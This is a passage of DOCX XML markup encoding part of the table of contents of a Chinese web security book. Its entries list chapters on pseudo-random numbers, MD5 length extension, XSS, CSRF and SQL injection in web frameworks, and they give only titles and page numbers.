        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="5"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>239</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="13"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:pos="1621" w:val="left" w:leader="none"/>
          <w:tab w:pos="1622" w:val="left" w:leader="none"/>
          <w:tab w:pos="8355" w:val="right" w:leader="dot"/>
        </w:tabs>
        <w:spacing w:line="240" w:lineRule="auto" w:before="59" w:after="0"/>
        <w:ind w:left="1621" w:right="0" w:hanging="590"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="SimSun" w:eastAsia="SimSun" w:hint="eastAsia"/>
          <w:spacing w:val="12"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>密</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="SimSun" w:eastAsia="SimSun" w:hint="eastAsia"/>
          <w:spacing w:val="10"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>钥管理</w:t>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="5"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>251</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="13"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:pos="1621" w:val="left" w:leader="none"/>
          <w:tab w:pos="1622" w:val="left" w:leader="none"/>
          <w:tab w:pos="8355" w:val="right" w:leader="dot"/>
        </w:tabs>
        <w:spacing w:line="240" w:lineRule="auto" w:before="56" w:after="0"/>
        <w:ind w:left="1621" w:right="0" w:hanging="590"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="SimSun" w:eastAsia="SimSun" w:hint="eastAsia"/>
          <w:spacing w:val="12"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>伪</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="SimSun" w:eastAsia="SimSun" w:hint="eastAsia"/>
          <w:spacing w:val="10"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>随机</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="SimSun" w:eastAsia="SimSun" w:hint="eastAsia"/>
          <w:spacing w:val="12"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>数</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="SimSun" w:eastAsia="SimSun" w:hint="eastAsia"/>
          <w:spacing w:val="10"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>问题</w:t>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="5"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>253</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="13"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:pos="2216" w:val="left" w:leader="none"/>
          <w:tab w:pos="2217" w:val="left" w:leader="none"/>
          <w:tab w:pos="8355" w:val="right" w:leader="dot"/>
        </w:tabs>
        <w:spacing w:line="240" w:lineRule="auto" w:before="81" w:after="0"/>
        <w:ind w:left="2216" w:right="0" w:hanging="691"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="SimSun" w:eastAsia="SimSun" w:hint="eastAsia"/>
          <w:spacing w:val="10"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>弱伪随机数的麻烦</w:t>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="5"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>253</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="13"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:pos="2216" w:val="left" w:leader="none"/>
          <w:tab w:pos="2217" w:val="left" w:leader="none"/>
          <w:tab w:pos="8355" w:val="right" w:leader="dot"/>
        </w:tabs>
        <w:spacing w:line="240" w:lineRule="auto" w:before="81" w:after="0"/>
        <w:ind w:left="2216" w:right="0" w:hanging="691"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="SimSun" w:eastAsia="SimSun" w:hint="eastAsia"/>
          <w:spacing w:val="10"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>时间真的随机吗</w:t>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="5"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>256</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="13"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:pos="2216" w:val="left" w:leader="none"/>
          <w:tab w:pos="2217" w:val="left" w:leader="none"/>
          <w:tab w:pos="8355" w:val="right" w:leader="dot"/>
        </w:tabs>
        <w:spacing w:line="240" w:lineRule="auto" w:before="81" w:after="0"/>
        <w:ind w:left="2216" w:right="0" w:hanging="691"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="SimSun" w:eastAsia="SimSun" w:hint="eastAsia"/>
          <w:spacing w:val="10"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>破解伪随机数算法的种子</w:t>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="5"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>257</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="13"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:pos="2216" w:val="left" w:leader="none"/>
          <w:tab w:pos="2217" w:val="left" w:leader="none"/>
          <w:tab w:pos="8355" w:val="right" w:leader="dot"/>
        </w:tabs>
        <w:spacing w:line="240" w:lineRule="auto" w:before="82" w:after="0"/>
        <w:ind w:left="2216" w:right="0" w:hanging="691"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="SimSun" w:eastAsia="SimSun" w:hint="eastAsia"/>
          <w:spacing w:val="10"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>使用安全的随机数</w:t>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="5"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>265</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:tabs>
          <w:tab w:pos="1621" w:val="left" w:leader="none"/>
          <w:tab w:pos="8355" w:val="right" w:leader="dot"/>
        </w:tabs>
        <w:spacing w:before="56"/>
        <w:ind w:left="1031" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:spacing w:val="1"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>11.8</w:t>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="12"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>小结</w:t>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:spacing w:val="5"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>265</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:tabs>
          <w:tab w:pos="8355" w:val="right" w:leader="dot"/>
        </w:tabs>
        <w:spacing w:before="180"/>
        <w:ind w:left="954" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:spacing w:val="10"/>
        </w:rPr>
        <w:t>（附</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="3"/>
        </w:rPr>
        <w:t>）</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:spacing w:val="3"/>
        </w:rPr>
        <w:t>Understanding</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:spacing w:val="7"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:spacing w:val="1"/>
        </w:rPr>
        <w:t>MD5</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:spacing w:val="12"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:spacing w:val="2"/>
        </w:rPr>
        <w:t>Length</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:spacing w:val="12"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:spacing w:val="3"/>
        </w:rPr>
        <w:t>Extension</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:spacing w:val="0"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:spacing w:val="2"/>
        </w:rPr>
        <w:t>Attack</w:t>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:spacing w:val="5"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>267</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="14"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:pos="1630" w:val="left" w:leader="none"/>
          <w:tab w:pos="1631" w:val="left" w:leader="none"/>
          <w:tab w:pos="8355" w:val="right" w:leader="dot"/>
        </w:tabs>
        <w:spacing w:line="240" w:lineRule="auto" w:before="672" w:after="0"/>
        <w:ind w:left="1630" w:right="0" w:hanging="599"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:pict>
          <v:group style="position:absolute;margin-left:12.72pt;margin-top:10.839992pt;width:411.15pt;height:16.1pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:paragraph;z-index:1912" coordorigin="254,217" coordsize="8223,322">
            <v:rect style="position:absolute;left:254;top:216;width:8223;height:322" filled="true" fillcolor="#dadada" stroked="false">
              <v:fill type="solid"/>
            </v:rect>
            <v:shape style="position:absolute;left:1315;top:238;width:7141;height:283" type="#_x0000_t202" filled="false" stroked="false">
              <v:textbox inset="0,0,0,0">
                <w:txbxContent>
                  <w:p>
                    <w:pPr>
                      <w:tabs>
                        <w:tab w:pos="7120" w:val="right" w:leader="dot"/>
                      </w:tabs>
                      <w:spacing w:line="282" w:lineRule="exact" w:before="0"/>
                      <w:ind w:left="0" w:right="0" w:firstLine="0"/>
                      <w:jc w:val="left"/>
                      <w:rPr>
                        <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
                        <w:sz w:val="18"/>
                      </w:rPr>
                    </w:pPr>
                    <w:r>
                      <w:rPr>
                        <w:rFonts w:ascii="Arial" w:eastAsia="Arial"/>
                        <w:spacing w:val="1"/>
                        <w:sz w:val="21"/>
                      </w:rPr>
                      <w:t>Web </w:t>
                    </w:r>
                    <w:r>
                      <w:rPr>
                        <w:spacing w:val="7"/>
                        <w:sz w:val="21"/>
                      </w:rPr>
                      <w:t>框</w:t>
                    </w:r>
                    <w:r>
                      <w:rPr>
                        <w:spacing w:val="10"/>
                        <w:sz w:val="21"/>
                      </w:rPr>
                      <w:t>架</w:t>
                    </w:r>
                    <w:r>
                      <w:rPr>
                        <w:spacing w:val="7"/>
                        <w:sz w:val="21"/>
                      </w:rPr>
                      <w:t>安全</w:t>
                      <w:tab/>
                    </w:r>
                    <w:r>
                      <w:rPr>
                        <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
                        <w:spacing w:val="5"/>
                        <w:sz w:val="18"/>
                      </w:rPr>
                      <w:t>280</w:t>
                    </w:r>
                  </w:p>
                </w:txbxContent>
              </v:textbox>
              <w10:wrap type="none"/>
            </v:shape>
            <v:shape style="position:absolute;left:283;top:284;width:810;height:236" type="#_x0000_t202" filled="false" stroked="false">
              <v:textbox inset="0,0,0,0">
                <w:txbxContent>
                  <w:p>
                    <w:pPr>
                      <w:spacing w:line="236" w:lineRule="exact" w:before="0"/>
                      <w:ind w:left="0" w:right="0" w:firstLine="0"/>
                      <w:jc w:val="left"/>
                      <w:rPr>
                        <w:sz w:val="21"/>
                      </w:rPr>
                    </w:pPr>
                    <w:r>
                      <w:rPr>
                        <w:sz w:val="21"/>
                      </w:rPr>
                      <w:t>第 </w:t>
                    </w:r>
                    <w:r>
                      <w:rPr>
                        <w:rFonts w:ascii="Arial" w:eastAsia="Arial"/>
                        <w:spacing w:val="1"/>
                        <w:sz w:val="21"/>
                      </w:rPr>
                      <w:t>12</w:t>
                    </w:r>
                    <w:r>
                      <w:rPr>
                        <w:rFonts w:ascii="Arial" w:eastAsia="Arial"/>
                        <w:spacing w:val="-33"/>
                        <w:sz w:val="21"/>
                      </w:rPr>
                      <w:t> </w:t>
                    </w:r>
                    <w:r>
                      <w:rPr>
                        <w:sz w:val="21"/>
                      </w:rPr>
                      <w:t>章</w:t>
                    </w:r>
                  </w:p>
                </w:txbxContent>
              </v:textbox>
              <w10:wrap type="none"/>
            </v:shape>
            <w10:wrap type="none"/>
          </v:group>
        </w:pict>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="2"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>MVC</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="8"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="SimSun" w:eastAsia="SimSun" w:hint="eastAsia"/>
          <w:spacing w:val="10"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>框</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="SimSun" w:eastAsia="SimSun" w:hint="eastAsia"/>
          <w:spacing w:val="12"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>架</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="SimSun" w:eastAsia="SimSun" w:hint="eastAsia"/>
          <w:spacing w:val="10"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>安全</w:t>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="5"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>280</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="14"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:pos="1631" w:val="left" w:leader="none"/>
          <w:tab w:pos="1632" w:val="left" w:leader="none"/>
          <w:tab w:pos="8355" w:val="right" w:leader="dot"/>
        </w:tabs>
        <w:spacing w:line="240" w:lineRule="auto" w:before="56" w:after="0"/>
        <w:ind w:left="1631" w:right="0" w:hanging="600"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="SimSun" w:eastAsia="SimSun" w:hint="eastAsia"/>
          <w:spacing w:val="10"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>模板</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="SimSun" w:eastAsia="SimSun" w:hint="eastAsia"/>
          <w:spacing w:val="12"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>引</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="SimSun" w:eastAsia="SimSun" w:hint="eastAsia"/>
          <w:spacing w:val="10"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>擎</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="SimSun" w:eastAsia="SimSun" w:hint="eastAsia"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>与</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="SimSun" w:eastAsia="SimSun" w:hint="eastAsia"/>
          <w:spacing w:val="-33"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="2"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>XSS</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="7"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="SimSun" w:eastAsia="SimSun" w:hint="eastAsia"/>
          <w:spacing w:val="10"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>防御</w:t>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="5"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>282</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="14"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:pos="1630" w:val="left" w:leader="none"/>
          <w:tab w:pos="1631" w:val="left" w:leader="none"/>
          <w:tab w:pos="8355" w:val="right" w:leader="dot"/>
        </w:tabs>
        <w:spacing w:line="240" w:lineRule="auto" w:before="56" w:after="0"/>
        <w:ind w:left="1630" w:right="0" w:hanging="599"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Web</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="10"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="SimSun" w:eastAsia="SimSun" w:hint="eastAsia"/>
          <w:spacing w:val="10"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>框</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="SimSun" w:eastAsia="SimSun" w:hint="eastAsia"/>
          <w:spacing w:val="12"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>架</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="SimSun" w:eastAsia="SimSun" w:hint="eastAsia"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>与</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="SimSun" w:eastAsia="SimSun" w:hint="eastAsia"/>
          <w:spacing w:val="-33"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="2"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>CSRF</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="5"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="SimSun" w:eastAsia="SimSun" w:hint="eastAsia"/>
          <w:spacing w:val="12"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>防御</w:t>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="5"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>285</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="14"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:pos="1630" w:val="left" w:leader="none"/>
          <w:tab w:pos="1631" w:val="left" w:leader="none"/>
          <w:tab w:pos="8355" w:val="right" w:leader="dot"/>
        </w:tabs>
        <w:spacing w:line="240" w:lineRule="auto" w:before="56" w:after="0"/>
        <w:ind w:left="1630" w:right="0" w:hanging="599"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:spacing w:val="2"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>HTTP </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="3"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Headers</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="10"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="SimSun" w:eastAsia="SimSun" w:hint="eastAsia"/>
          <w:spacing w:val="10"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>管理</w:t>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="5"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>287</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="14"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:pos="1631" w:val="left" w:leader="none"/>
          <w:tab w:pos="1632" w:val="left" w:leader="none"/>
          <w:tab w:pos="8355" w:val="right" w:leader="dot"/>
        </w:tabs>
        <w:spacing w:line="240" w:lineRule="auto" w:before="55" w:after="0"/>
        <w:ind w:left="1631" w:right="0" w:hanging="600"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="SimSun" w:eastAsia="SimSun" w:hint="eastAsia"/>
          <w:spacing w:val="10"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>数据</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="SimSun" w:eastAsia="SimSun" w:hint="eastAsia"/>
          <w:spacing w:val="12"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>持</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="SimSun" w:eastAsia="SimSun" w:hint="eastAsia"/>
          <w:spacing w:val="10"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>久层</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="SimSun" w:eastAsia="SimSun" w:hint="eastAsia"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>与</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="SimSun" w:eastAsia="SimSun" w:hint="eastAsia"/>
          <w:spacing w:val="-33"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="2"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>SQL</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="5"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="SimSun" w:eastAsia="SimSun" w:hint="eastAsia"/>
          <w:spacing w:val="12"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>注入</w:t>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="5"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>288</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="14"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:pos="1631" w:val="left" w:leader="none"/>
          <w:tab w:pos="1632" w:val="left" w:leader="none"/>
          <w:tab w:pos="8355" w:val="right" w:leader="dot"/>
        </w:tabs>
        <w:spacing w:line="240" w:lineRule="auto" w:before="56" w:after="0"/>
        <w:ind w:left="1631" w:right="0" w:hanging="600"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="SimSun" w:eastAsia="SimSun" w:hint="eastAsia"/>
          <w:spacing w:val="10"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>还能</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="SimSun" w:eastAsia="SimSun" w:hint="eastAsia"/>
          <w:spacing w:val="12"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>想</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="SimSun" w:eastAsia="SimSun" w:hint="eastAsia"/>
          <w:spacing w:val="10"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>到什么</w:t>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="5"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>289</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="14"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:pos="1630" w:val="left" w:leader="none"/>
          <w:tab w:pos="1631" w:val="left" w:leader="none"/>
          <w:tab w:pos="8355" w:val="right" w:leader="dot"/>
        </w:tabs>
        <w:spacing w:line="240" w:lineRule="auto" w:before="56" w:after="0"/>
        <w:ind w:left="1630" w:right="0" w:hanging="599"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Web</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="10"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="SimSun" w:eastAsia="SimSun" w:hint="eastAsia"/>
          <w:spacing w:val="10"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>框架</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="SimSun" w:eastAsia="SimSun" w:hint="eastAsia"/>
          <w:spacing w:val="12"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>自</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="SimSun" w:eastAsia="SimSun" w:hint="eastAsia"/>
          <w:spacing w:val="10"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>身安全</w:t>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="5"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>289</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="14"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:pos="2216" w:val="left" w:leader="none"/>
